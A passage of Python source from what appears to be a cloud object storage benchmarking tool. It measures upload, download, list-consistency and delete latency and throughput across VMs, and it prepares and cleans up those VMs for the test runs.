# we only divide by the time that stream was actually transmitting.
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput',
np.sum((size / active_time * 8
for size, active_time
in zip(total_active_sizes, total_active_times))),
'bit / second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput (with gap)',
np.sum((size / duration * 8
for size, duration in zip(total_active_sizes, active_durations))),
'bit / second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput (simplified)',
sum([np.sum(size) for size in sizes]) /
(last_stop_time - first_start_time) * 8,
'bit / second', metadata=distribution_metadata))
# QPS metrics
results.append(sample.Sample(
'Multi-stream ' + operation + ' QPS (any stream active)',
num_records / (last_stop_time - first_start_time), 'operation / second',
metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' QPS (all streams active)',
len(all_active_latencies) / (first_stop_time - last_start_time),
'operation / second', metadata=distribution_metadata))
# Statistics about benchmarking overhead
gap_time = sum((active_duration - active_time
for active_duration, active_time
in zip(active_durations, total_active_times)))
results.append(sample.Sample(
'Multi-stream ' + operation + ' total gap time',
gap_time, 'second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' gap time proportion',
gap_time / (first_stop_time - last_start_time) * 100.0,
'percent', metadata=distribution_metadata))
def _DistributionToBackendFormat(dist):
"""Convert an object size distribution to the format needed by the backend.
Args:
dist: a distribution, given as a dictionary mapping size to
frequency. Size will be a string with a quantity and a
unit. Frequency will be a percentage, including a '%'
character. dist may also be a string, in which case it represents
a single object size which applies to 100% of objects.
Returns:
A dictionary giving an object size distribution. Sizes will be
integers representing bytes. Frequencies will be floating-point
numbers in [0,100], representing percentages.
Raises:
ValueError if dist is not a valid distribution.
"""
if isinstance(dist, dict):
val = {flag_util.StringToBytes(size):
flag_util.StringToRawPercent(frequency)
for size, frequency in six.iteritems(dist)}
else:
# We allow compact notation for point distributions. For instance,
# '1KB' is an abbreviation for '{1KB: 100%}'.
val = {flag_util.StringToBytes(dist): 100.0}
# I'm requiring exact addition to 100, which can always be satisfied
# with integer percentages. If we want to allow general decimal
# percentages, all we have to do is replace this equality check with
# approximate equality.
if sum(six.itervalues(val)) != 100.0:
raise ValueError("Frequencies in %s don't add to 100%%!" % dist)
return val
class APIScriptCommandBuilder(object):
"""Builds command lines for the API test script.
Attributes:
test_script_path: the path to the API test script on the remote machine.
storage: the storage provider to use, in the format expected by
the test script.
service: the ObjectStorageService object corresponding to the
storage provider.
"""
def __init__(self, test_script_path, storage, service):
self.test_script_path = test_script_path
self.storage = storage
self.service = service
def BuildCommand(self, args):
"""Build a command string for the API test script.
Args:
args: a list of strings. These will become space-separated
arguments to the test script.
Returns:
A string that can be passed to vm.RemoteCommand.
"""
cmd_parts = [
self.test_script_path,
'--storage_provider=%s' % self.storage
] + args + self.service.APIScriptArgs()
if FLAGS.object_storage_storage_class is not None:
cmd_parts += ['--object_storage_class',
FLAGS.object_storage_storage_class]
return ' '.join(cmd_parts)
class UnsupportedProviderCommandBuilder(APIScriptCommandBuilder):
"""A dummy command builder for unsupported providers.
When a provider isn't supported by the API test script yet, we
create this command builder for them. It will let us run the CLI
benchmark on that provider, but if the user tries to run an API
benchmark, it will throw an error.
Attributes:
provider: the name of the unsupported provider.
"""
def __init__(self, provider):
self.provider = provider
def BuildCommand(self, args):
raise NotImplementedError('API tests are not supported on provider %s.' %
self.provider)
def OneByteRWBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for small object latency.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
one_byte_rw_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--scenario=OneByteRW'])
_, raw_result = vm.RemoteCommand(one_byte_rw_cmd)
logging.info('OneByteRW raw result is %s', raw_result)
for up_and_down in ([
MultistreamOperationType.upload, MultistreamOperationType.download
]):
search_string = 'One byte %s - (.*)' % up_and_down
result_string = re.findall(search_string, raw_result)
sample_name = ONE_BYTE_LATENCY % up_and_down
if len(result_string) > 0:
_JsonStringToPercentileResults(results,
result_string[0],
sample_name,
LATENCY_UNIT,
metadata)
else:
raise ValueError('Unexpected test outcome from OneByteRW api test: '
'%s.' % raw_result)
def SingleStreamThroughputBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for large object throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
single_stream_throughput_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--scenario=SingleStreamThroughput'])
_, raw_result = vm.RemoteCommand(single_stream_throughput_cmd)
logging.info('SingleStreamThroughput raw result is %s', raw_result)
for up_and_down in [
MultistreamOperationType.upload, MultistreamOperationType.download
]:
search_string = 'Single stream %s throughput in Bps: (.*)' % up_and_down
result_string = re.findall(search_string, raw_result)
sample_name = SINGLE_STREAM_THROUGHPUT % up_and_down
if not result_string:
raise ValueError('Unexpected test outcome from '
'SingleStreamThroughput api test: %s.' % raw_result)
# Convert Bytes per second to Mega bits per second
# We use MB (10^6) to be consistent with network
# bandwidth convention.
result = json.loads(result_string[0])
for percentile in PERCENTILES_LIST:
results.append(sample.Sample(
('%s %s') % (sample_name, percentile),
8 * float(result[percentile]) / 1000 / 1000,
THROUGHPUT_UNIT,
metadata))
def ListConsistencyBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for bucket list consistency.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
list_consistency_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--iterations=%d' % FLAGS.object_storage_list_consistency_iterations,
'--scenario=ListConsistency'])
_, raw_result = vm.RemoteCommand(list_consistency_cmd)
logging.info('ListConsistency raw result is %s', raw_result)
for scenario in LIST_CONSISTENCY_SCENARIOS:
metric_name = '%s %s' % (scenario, LIST_CONSISTENCY_PERCENTAGE)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
if not result_string:
raise ValueError(
'Cannot get percentage from ListConsistency test.')
results.append(sample.Sample(
metric_name,
(float)(result_string[0]),
NA_UNIT,
metadata))
# Parse the list inconsistency window if there is any.
metric_name = '%s %s' % (scenario, LIST_INCONSISTENCY_WINDOW)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
_JsonStringToPercentileResults(results,
result_string[0],
metric_name,
LATENCY_UNIT,
metadata)
# Also report the list latency. These latencies are from the lists
# that were consistent.
metric_name = '%s %s' % (scenario, LIST_LATENCY)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
_JsonStringToPercentileResults(results,
result_string[0],
metric_name,
LATENCY_UNIT,
metadata)
def LoadWorkerOutput(output):
"""Load output from worker processes to our internal format.
Args:
output: list of strings. The stdouts of all worker processes.
Returns:
A tuple of start_time, latency, size. Each of these is a list of
numpy arrays, one array per worker process. start_time[i],
latency[i], and size[i] together form a table giving the start
time, latency, and size (bytes transmitted or received) of all
send/receive operations for worker i.
start_time holds POSIX timestamps, stored as np.float64. latency
holds times in seconds, stored as np.float64. size holds sizes in
bytes, stored as np.int64.
Example:
start_time[i] latency[i] size[i]
------------- ---------- -------
0.0 0.5 100
1.0 0.7 200
2.3 0.3 100
Raises:
AssertionError, if an individual worker's input includes
overlapping operations, or operations that don't move forward in
time, or if the input list isn't in stream number order.
"""
start_times = []
latencies = []
sizes = []
for worker_out in output:
json_out = json.loads(worker_out)
for stream in json_out:
assert len(stream['start_times']) == len(stream['latencies'])
assert len(stream['latencies']) == len(stream['sizes'])
start_times.append(np.asarray(stream['start_times'], dtype=np.float64))
latencies.append(np.asarray(stream['latencies'], dtype=np.float64))
sizes.append(np.asarray(stream['sizes'], dtype=np.int64))
return start_times, latencies, sizes
def _RunMultiStreamProcesses(vms, command_builder, cmd_args, streams_per_vm):
"""Runs all of the multistream read or write processes and doesn't return
until they complete.
Args:
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
cmd_args: arguments for the command_builder.
streams_per_vm: number of threads per vm.
"""
output = [None] * len(vms)
def RunOneProcess(vm_idx):
logging.info('Running on VM %s.', vm_idx)
cmd = command_builder.BuildCommand(cmd_args + [
'--stream_num_start=%s' % (vm_idx * streams_per_vm),
'--vm_id=%s' % vm_idx
])
out, _ = vms[vm_idx].RobustRemoteCommand(cmd, should_log=False)
output[vm_idx] = out
# Each vm/process has a thread managing it.
threads = [
threading.Thread(target=RunOneProcess, args=(vm_idx,))
for vm_idx in range(len(vms))]
for thread in threads:
thread.start()
logging.info('Started %s processes.', len(vms))
# Wait for the threads to finish
for thread in threads:
thread.join()
logging.info('All processes complete.')
return output
def _DatetimeNow():
"""Returns datetime.datetime.now()."""
return datetime.datetime.now()
def _ColdObjectsWrittenFilename():
"""Generates a name for the objects_written_file.
Returns:
The name of the objects_written_file if it should be created, or None.
"""
if FLAGS.object_storage_objects_written_file_prefix:
# Note this format is required by _ColdObjectsWrittenFileAgeHours.
datetime_suffix = _DatetimeNow().strftime('%Y%m%d-%H%M')
return '%s-%s-%s-%s' % (
FLAGS.object_storage_objects_written_file_prefix,
FLAGS.object_storage_region,
uuid.uuid4(), # Add a UUID to support parallel runs that upload data.
datetime_suffix)
return None
def _ColdObjectsWrittenFileAgeHours(filename):
"""Determines the age in hours of an objects_written_file.
Args:
filename: The name of the file.
Returns:
The age of the file in hours (based on the name), or None.
"""
# Parse the year, month, day, hour, and minute from the filename based on the
# way it is written in _ColdObjectsWrittenFilename.
match = re.search(r'(\d\d\d\d)(\d\d)(\d\d)-(\d\d)(\d\d)$', filename)
if not match:
return None
year, month, day, hour, minute = (int(item) for item in match.groups())
write_datetime = datetime.datetime(year, month, day, hour, minute)
write_timedelta = _DatetimeNow() - write_datetime
return write_timedelta.total_seconds() / _SECONDS_PER_HOUR
def _MultiStreamOneWay(results, metadata, vms, command_builder,
service, bucket_name, operation):
"""Measures multi-stream latency and throughput in one direction.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
operation: 'upload' or 'download'
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
objects_written_file = posixpath.join(vm_util.VM_TMP_DIR,
OBJECTS_WRITTEN_FILE)
size_distribution = _DistributionToBackendFormat(
FLAGS.object_storage_object_sizes)
logging.info('Distribution %s, backend format %s.',
FLAGS.object_storage_object_sizes, size_distribution)
streams_per_vm = FLAGS.object_storage_streams_per_vm
num_vms = FLAGS.num_vms
start_time = (
time.time() +
MultiThreadStartDelay(num_vms, streams_per_vm).m_as('second'))
delete_delay = MultiThreadDeleteDelay(num_vms, streams_per_vm)
logging.info('Start time is %s', start_time)
logging.info('Delete delay is %s', delete_delay)
cmd_args = [
'--bucket=%s' % bucket_name,
'--objects_per_stream=%s' % (
FLAGS.object_storage_multistream_objects_per_stream),
'--num_streams=%s' % streams_per_vm,
'--start_time=%s' % start_time,
'--objects_written_file=%s' % objects_written_file]
if operation == MultistreamOperationType.upload:
cmd_args += [
'--object_sizes="%s"' % size_distribution,
'--object_naming_scheme=%s' % FLAGS.object_storage_object_naming_scheme,
'--scenario=MultiStreamWrite']
elif operation == MultistreamOperationType.download:
cmd_args += ['--scenario=MultiStreamRead']
elif operation == MultistreamOperationType.delete:
cmd_args += [
'--scenario=MultiStreamDelete',
'--delete_delay=%s' % delete_delay
]
elif operation == MultistreamOperationType.bulk_delete:
cmd_args += [
'--scenario=MultiStreamDelete', '--bulk_delete=true',
'--delete_delay=%s' % delete_delay
]
else:
raise Exception('Value of operation must be \'upload\' or \'download\'.'
'Value is: \'' + operation.name + '\'')
output = _RunMultiStreamProcesses(vms, command_builder, cmd_args,
streams_per_vm)
start_times, latencies, sizes = LoadWorkerOutput(output)
if FLAGS.object_storage_worker_output:
with open(FLAGS.object_storage_worker_output, 'w') as out_file:
out_file.write(json.dumps(output))
_ProcessMultiStreamResults(
start_times,
latencies,
sizes,
operation.name,
list(six.iterkeys(size_distribution)),
results,
metadata=metadata)
# Write the objects written file if the flag is set and this is an upload
objects_written_path_local = _ColdObjectsWrittenFilename()
if operation == MultistreamOperationType.upload and objects_written_path_local is not None:
# Get the objects written from all the VMs
# Note these are JSON lists with the following format:
# [[object1_name, object1_size],[object2_name, object2_size],...]
outs = vm_util.RunThreaded(
lambda vm: vm.RemoteCommand('cat ' + objects_written_file), vms)
maybe_storage_account = ''
maybe_resource_group = ''
if FLAGS.storage == 'Azure':
maybe_storage_account = '"azure_storage_account": "%s", ' % \
service.storage_account.name
maybe_resource_group = '"azure_resource_group": "%s", ' % \
service.resource_group.name
# Merge the objects written from all the VMs into a single string
objects_written_json = \
'{%s%s"bucket_name": "%s", "objects_written": %s}' % \
(maybe_storage_account, maybe_resource_group, bucket_name,
'[' + ','.join([out for out, _ in outs]) + ']')
# Write the file
with open(objects_written_path_local, 'w') as objects_written_file_local:
objects_written_file_local.write(objects_written_json)
def MultiStreamRWBenchmark(results, metadata, vms, command_builder,
service, bucket_name):
"""A benchmark for multi-stream read/write latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream write test on %s VMs.', len(vms))
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.upload)
logging.info('Finished multi-stream write test. Starting '
'multi-stream read test.')
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.download)
logging.info('Finished multi-stream read test.')
def MultiStreamWriteBenchmark(results, metadata, vms, command_builder,
service, bucket_name):
"""A benchmark for multi-stream write latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream write test on %s VMs.', len(vms))
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.upload)
logging.info('Finished multi-stream write test.')
def MultiStreamReadBenchmark(results, metadata, vms, command_builder,
service, bucket_name, read_objects):
"""A benchmark for multi-stream read latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
read_objects: List of lists of [object_name, object_size]. In the outermost
list, each element corresponds to a VM's worker process.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream read test on %s VMs.', len(vms))
assert read_objects is not None, (
'api_multistream_reads scenario requires the '
'object_storage_read_objects_prefix flag to be set.')
# Send over the objects written file
try:
# Write the per-VM objects-written-files
assert len(read_objects) == len(vms), (
'object_storage_read_objects_prefix file specified requires exactly '
'%d VMs, but %d were provisioned.' % (len(read_objects), len(vms)))
for vm, vm_objects_written in zip(vms, read_objects):
# Note that each file is written with a unique name so that parallel runs
# don't overwrite the same local file. They are pushed to the VM to a file
# named OBJECTS_WRITTEN_FILE.
tmp_objects_written_path = os.path.join(vm_util.GetTempDir(),
'%s-%s' % (OBJECTS_WRITTEN_FILE,
vm.name))
with open(tmp_objects_written_path, 'w') as objects_written_file:
objects_written_file.write(json.dumps(vm_objects_written))
vm.PushFile(tmp_objects_written_path,
posixpath.join(vm_util.VM_TMP_DIR, OBJECTS_WRITTEN_FILE))
except Exception as e:
raise Exception('Failed to upload the objects written files to the VMs: '
'%s' % e)
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.download)
logging.info('Finished multi-stream read test.')
def MultiStreamDelete(results, metadata, vms, command_builder, service,
bucket_name):
"""A benchmark for multi-stream delete.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream delete test on %s VMs.', len(vms))
if FLAGS.object_storage_bulk_delete:
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.bulk_delete)
else:
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.delete)
logging.info('Finished multi-stream delete test.')
def CheckPrerequisites(benchmark_config):
"""Verifies that the required resources are present.
Args:
benchmark_config: Benchmark config to verify.
Raises:
perfkitbenchmarker.data.ResourceNotFound: On missing resource.
perfkitbenchmarker.errors.Setup.InvalidFlagConfigurationError: On invalid
flags.
"""
del benchmark_config
data.ResourcePath(DATA_FILE)
if FLAGS.object_storage_apply_region_suffix_to_bucket_name:
if not FLAGS.object_storage_region:
raise errors.Setup.InvalidFlagConfigurationError(
'Please specify --object_storage_region if using '
'--object_storage_apply_region_suffix_to_bucket_name.')
def _AppendPercentilesToResults(output_results, input_results, metric_name,
metric_unit, metadata):
# PercentileCalculator will (correctly) raise an exception on empty
# input, but an empty input list makes semantic sense here.
if len(input_results) == 0:
return
percentiles = PercentileCalculator(input_results)
for percentile in PERCENTILES_LIST:
output_results.append(sample.Sample(('%s %s') % (metric_name, percentile),
percentiles[percentile],
metric_unit,
metadata))
def CLIThroughputBenchmark(output_results, metadata, vm, command_builder,
service, bucket):
"""A benchmark for CLI tool throughput.
We will upload and download a set of files from/to a local directory
via cli tools and observe the throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
NotEnoughResultsError: if we failed too many times to upload or download.
"""
data_directory = '/tmp/run/data'
# The real solution to the iteration count issue is dynamically
# choosing the number of iterations based on how long they
# take. This will work for now, though.
if FLAGS.storage == providers.AZURE:
iteration_count = CLI_TEST_ITERATION_COUNT_AZURE
elif FLAGS.cli_test_size == 'normal':
iteration_count = CLI_TEST_ITERATION_COUNT
else:
iteration_count = LARGE_CLI_TEST_ITERATION_COUNT
# The CLI-based tests require some provisioning on the VM first.
vm.RemoteCommand(
'cd /tmp/run/; bash cloud-storage-workload.sh %s' % FLAGS.cli_test_size)
# CLI tool based tests.
cli_upload_results = []
cli_download_results = []
if FLAGS.cli_test_size == 'normal':
data_size_in_mbits = DATA_SIZE_IN_MBITS
file_names = ['file-%s.dat' % i for i in range(100)]
else:
data_size_in_mbits = LARGE_DATA_SIZE_IN_MBITS
file_names = ['file_large_3gib.dat']
for _ in range(iteration_count):
try:
service.EmptyBucket(bucket)
except Exception:
pass
try:
_, res = service.CLIUploadDirectory(vm, data_directory,
file_names, bucket)
except errors.VirtualMachine.RemoteCommandError:
logging.info('failed to upload, skip this iteration.')
continue
throughput = data_size_in_mbits / vm_util.ParseTimeCommandResult(res)
logging.info('cli upload throughput %f', throughput)
cli_upload_results.append(throughput)
try:
vm.RemoveFile(posixpath.join(DOWNLOAD_DIRECTORY, '*'))
except Exception:
pass
try:
_, res = service.CLIDownloadBucket(vm, bucket,
file_names, DOWNLOAD_DIRECTORY)
except errors.VirtualMachine.RemoteCommandError:
logging.info('failed to download, skip this iteration.')
continue
throughput = data_size_in_mbits / vm_util.ParseTimeCommandResult(res)
logging.info('cli download throughput %f', throughput)
cli_download_results.append(throughput)
expected_successes = iteration_count * (1 - CLI_TEST_FAILURE_TOLERANCE)
if (len(cli_download_results) < expected_successes or
len(cli_upload_results) < expected_successes):
raise NotEnoughResultsError('Failed to complete the required number of '
'iterations.')
# Report various percentiles.
metrics_prefix = ''
if FLAGS.cli_test_size != 'normal':
metrics_prefix = '%s ' % FLAGS.cli_test_size
_AppendPercentilesToResults(output_results,
cli_upload_results,
'%s%s' % (metrics_prefix,
UPLOAD_THROUGHPUT_VIA_CLI),
THROUGHPUT_UNIT,
metadata)
_AppendPercentilesToResults(output_results,
cli_download_results,
'%s%s' % (metrics_prefix,
DOWNLOAD_THROUGHPUT_VIA_CLI),
THROUGHPUT_UNIT,
metadata)
def PrepareVM(vm, service):
vm.InstallPackages('python3-pip')
# dependencies of API_TEST_SCRIPT
# Pip version 20.2.2 is the last verision before pip drops support for py3.5
# https://pip.pypa.io/en/stable/news/#id119
vm.RemoteCommand('sudo pip3 install --upgrade "pip<=20.2.2"')
vm.RemoteCommand('sudo pip3 install absl-py')
vm.RemoteCommand('sudo pip3 install pyyaml')
vm.Install('openssl')
# Prepare data on vm, create a run directory in temporary directory, and add
# permission.
vm.RemoteCommand('sudo mkdir -p ' + SCRIPT_DIR)
vm.RemoteCommand('sudo chmod 777 ' + SCRIPT_DIR)
vm.RemoteCommand('sudo mkdir -p ' + DOWNLOAD_DIRECTORY)
vm.RemoteCommand('sudo chmod 777 ' + DOWNLOAD_DIRECTORY)
vm.RemoteCommand('sudo mkdir -p ' + REMOTE_PACKAGE_DIR)
vm.RemoteCommand('sudo chmod 777 ' + REMOTE_PACKAGE_DIR)
file_path = data.ResourcePath(DATA_FILE)
vm.PushFile(file_path, SCRIPT_DIR)
# push the test script
script_path = data.ResourcePath(
os.path.join(API_TEST_SCRIPTS_DIR, API_TEST_SCRIPT))
vm.PushFile(script_path, '/tmp/run/')
# push the package dependencies of the test script
for file_name in API_TEST_SCRIPT_PACKAGE_FILES + service.APIScriptFiles():
path = data.ResourcePath(
os.path.join(API_TEST_SCRIPTS_DIR, file_name))
logging.info('Uploading %s to %s', path, vm)
vm.PushFile(path, REMOTE_PACKAGE_DIR)
service.PrepareVM(vm)
def CleanupVM(vm, service):
service.CleanupVM(vm)
vm.RemoteCommand('/usr/bin/yes | sudo pip3 uninstall absl-py')
vm.RemoteCommand('sudo rm -rf /tmp/run/')
objects_written_file = posixpath.join(vm_util.VM_TMP_DIR,
OBJECTS_WRITTEN_FILE)
vm.RemoteCommand('rm -f %s' % objects_written_file)
def Prepare(benchmark_spec):
"""Prepare vm with cloud provider tool and prepare vm with data file.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Raises:
ColdDataError: If this benchmark is reading cold data, but the data isn't
cold enough (as configured by object_storage_read_objects_min_hours).
"""
# We would like to always cleanup server side states when exception happens.
benchmark_spec.always_call_cleanup = True
# Load the objects to read file if specified
benchmark_spec.read_objects = None
if FLAGS.object_storage_read_objects_prefix is not None:
# By taking a glob, we choose an arbitrary file that is old enough, assuming
# there is ever more than one.
search_prefix = '%s-%s*' % (
FLAGS.object_storage_read_objects_prefix,
FLAGS.object_storage_region)
read_objects_filenames = glob.glob(search_prefix)
logging.info('Considering object files %s*: %s', search_prefix,
read_objects_filenames)
for filename in read_objects_filenames:
age_hours = _ColdObjectsWrittenFileAgeHours(filename)
if age_hours and age_hours > FLAGS.object_storage_read_objects_min_hours:
read_objects_filename = filename
break
else:
raise ColdDataError(
'Object data older than %d hours does not exist. Current cold data '
'files include the following: %s' % (
FLAGS.object_storage_read_objects_min_hours,
read_objects_filenames))
with open(read_objects_filename) as read_objects_file:
# Format of json structure is:
# {"bucket_name": <bucket_name>,
# ... any other provider-specific context needed
# "objects_written": <objects_written_array>}
benchmark_spec.read_objects = json.loads(read_objects_file.read())
benchmark_spec.read_objects_filename = read_objects_filename
benchmark_spec.read_objects_age_hours = age_hours
# When this benchmark reads these files, the data will be deleted. Delete
# the file that specifies the data too.
if not FLAGS.object_storage_dont_delete_bucket:
os.remove(read_objects_filename)
assert benchmark_spec.read_objects is not None, (
'Failed to read the file specified by '
'--object_storage_read_objects_prefix')
# Load the provider and its object storage service
providers.LoadProvider(FLAGS.storage)
# Determine the bucket name.
if benchmark_spec.read_objects is not None:
# Using an existing bucket
bucket_name = benchmark_spec.read_objects['bucket_name']
if FLAGS.object_storage_bucket_name is not None:
logging.warning('--object_storage_bucket_name ignored because '
'--object_storage_read_objects was specified')
else:
# Use a new bucket (or the name of a specified bucket).
bucket_name = FLAGS.object_storage_bucket_name or 'pkb%s' % FLAGS.run_uri
if FLAGS.object_storage_apply_region_suffix_to_bucket_name:
# Avoid non-alphanumeric characters in the region as bucket names on some
# clouds cannot contain non-alphanumeric characters.
bucket_name = '%s%s' % (bucket_name,
re.sub(r'[\W_]', '', FLAGS.object_storage_region))
service = object_storage_service.GetObjectStorageClass(FLAGS.storage)()
if (FLAGS.storage == 'Azure' and
FLAGS.object_storage_read_objects_prefix is not None):
# Storage provider is azure and we are reading existing objects.
# Need to prepare the ObjectStorageService with the existing storage
# account and resource group associated with the bucket containing our
# objects
service.PrepareService(
FLAGS.object_storage_region,
# On Azure, use an existing storage account if we
# are reading existing objects
(benchmark_spec.read_objects['azure_storage_account'],
benchmark_spec.read_objects['azure_resource_group']))
elif FLAGS.storage == 'Azure' and FLAGS.object_storage_bucket_name:
# We are using a bucket that may exist from a previous run. We should use
# a storage account and resource group for this bucket based on the same
# name (for consistency).
service.PrepareService(
FLAGS.object_storage_region,
# The storage account must not exceed 24 characters.
(bucket_name[:24], bucket_name + '-resource-group'),
try_to_create_storage_account_and_resource_group=True)
else:
service.PrepareService(FLAGS.object_storage_region)
vms = benchmark_spec.vms
vm_util.RunThreaded(lambda vm: PrepareVM(vm, service), vms)
# Make the bucket.
if benchmark_spec.read_objects is None:
# Fail if we cannot create the bucket as long as the bucket name was not
# set via a flag. If it was set by a flag, then we will still try to create
# the bucket, but won't fail if it was created. This supports running the
# benchmark on the same bucket multiple times.
raise_on_bucket_creation_failure = not FLAGS.object_storage_bucket_name
if FLAGS.storage == 'GCP' and FLAGS.object_storage_gcs_multiregion:
# Use a GCS multiregional bucket
multiregional_service = gcs.GoogleCloudStorageService()
multiregional_service.PrepareService(FLAGS.object_storage_gcs_multiregion
or DEFAULT_GCS_MULTIREGION)
multiregional_service.MakeBucket(
bucket_name, raise_on_failure=raise_on_bucket_creation_failure)
else:
# Use a regular bucket
service.MakeBucket(
bucket_name, raise_on_failure=raise_on_bucket_creation_failure)
# Save the service and the bucket name for later
benchmark_spec.service = service
benchmark_spec.bucket_name = bucket_name
def Run(benchmark_spec):
"""Run storage benchmark and publish results.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Returns:
Total throughput in the form of tuple. The tuple contains
the sample metric (string), value (float), unit (string).
"""
logging.info('Start benchmarking object storage service, '
'scenario is %s, storage provider is %s.',
FLAGS.object_storage_scenario, FLAGS.storage)
service = benchmark_spec.service
bucket_name = benchmark_spec.bucket_name
metadata = {'storage_provider': FLAGS.storage}
vms = benchmark_spec.vms
if FLAGS[OBJECT_STORAGE_REGION].present:
metadata[REGIONAL_BUCKET_LOCATION] = FLAGS.object_storage_region
else:
metadata[REGIONAL_BUCKET_LOCATION] = DEFAULT
if FLAGS[OBJECT_STORAGE_GCS_MULTIREGION].present:
metadata[GCS_MULTIREGION_LOCATION] = FLAGS.object_storage_gcs_multiregion
else:
metadata[GCS_MULTIREGION_LOCATION] = DEFAULT
metadata.update(service.Metadata(vms[0]))
results = []
test_script_path = '/tmp/run/%s' % API_TEST_SCRIPT
try:
command_builder = APIScriptCommandBuilder(
test_script_path, STORAGE_TO_API_SCRIPT_DICT[FLAGS.storage], service)
except KeyError:
command_builder = UnsupportedProviderCommandBuilder(FLAGS.storage)
for name, benchmark in [('cli', CLIThroughputBenchmark),
('api_data', OneByteRWBenchmark),
('api_data', SingleStreamThroughputBenchmark),
('api_namespace', ListConsistencyBenchmark)]:
if FLAGS.object_storage_scenario in {name, 'all'}:
benchmark(results, metadata, vms[0], command_builder,
service, bucket_name)
# MultiStreamRW and MultiStreamWrite support multiple VMs, so they have a
# slightly different calling convention than the others.
for name, benchmark in [('api_multistream', MultiStreamRWBenchmark),
('api_multistream_writes',
MultiStreamWriteBenchmark)]:
if FLAGS.object_storage_scenario in {name, 'all'}:
benchmark(results, metadata, vms, command_builder, service, bucket_name)
# MultiStreamRead has the additional 'read_objects' parameter
if FLAGS.object_storage_scenario in {'api_multistream_reads', 'all'}:
metadata['cold_objects_filename'] = benchmark_spec.read_objects_filename
metadata['cold_objects_age_hours'] = benchmark_spec.read_objects_age_hours
MultiStreamReadBenchmark(results, metadata, vms, command_builder, service,
bucket_name,
benchmark_spec.read_objects['objects_written'])
# Clear the bucket if we're not saving the objects for later
# This is needed for long running tests, or else the objects would just pile
# up after each run.
keep_bucket = (FLAGS.object_storage_objects_written_file_prefix is not None or
FLAGS.object_storage_dont_delete_bucket)
if not keep_bucket:
MultiStreamDelete(results, metadata, vms, command_builder, service,
bucket_name)
service.UpdateSampleMetadata(results)
return results
def Cleanup(benchmark_spec):
"""Clean up storage bucket/container and clean up vm.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
if not hasattr(benchmark_spec, 'service'):
logging.info('Skipping cleanup as prepare method failed')
return
service = benchmark_spec.service
bucket_name = benchmark_spec.bucket_name
vms = benchmark_spec.vms
